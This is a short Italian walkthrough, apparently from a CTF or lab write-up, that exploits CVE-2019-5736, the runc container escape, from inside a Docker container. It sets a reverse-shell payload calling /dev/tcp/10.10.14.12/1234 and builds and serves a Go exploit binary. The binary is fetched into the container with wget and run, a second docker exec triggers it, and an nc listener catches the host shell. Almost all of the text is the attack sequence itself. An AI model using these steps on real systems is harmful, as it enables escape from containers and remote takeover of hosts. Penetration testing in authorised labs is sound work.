
Exploit basato su Go per CVE-2019-5736 (Runc container escape) con un payload di reverse shell personalizzabile, progettato per penetration testing e operazioni red team contro container Docker vulnerabili.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
la macchina è vulnerabile a CVE-2019-5736, segui i passaggi nell'exploit Runc (CVE-2019-5736). Scarica il file main.go, modifica il payload nel file come segue:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
Successivamente, esegui:
go build main.go
Ospita un server http:
python3 -m http.server

Poi apri 3 terminali come di seguito:

Terminale 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminale 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminale 3
nc -nlvp 1234
una volta eseguito ./main nel primo terminale ssh, esegui immediatamente il secondo comando nel secondo terminale ssh, quindi otterrai la reverse shell netcat nel terminale 3

